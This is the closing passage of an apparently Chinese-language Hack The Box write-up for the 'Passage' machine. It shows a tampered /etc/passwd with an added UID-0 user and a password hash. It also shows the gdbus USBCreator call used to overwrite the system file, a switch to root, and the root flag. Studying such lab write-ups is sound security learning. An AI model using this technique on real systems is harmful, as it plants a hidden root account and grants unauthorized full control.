list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
shiyan:$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
nadav@passage:~$ pwd
/home/nadav
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true
()
nadav@passage:~$ tail -3 /etc/passwd
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
shiyan:$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
nadav@passage:~$ su -shiyan
Password: 
su: Authentication failure
nadav@passage:~$ su -shiyan
Password: 
su: Authentication failure
nadav@passage:~$

31、切换下用户，获取下最终的flag信息

nadav@passage:~$ su shiyan
Password: 
root@passage:/home/nadav# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:/home/nadav# cat /root/root.txt
abbe695cf002028f0d9965796e775e52
root@passage:/home/nadav# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/275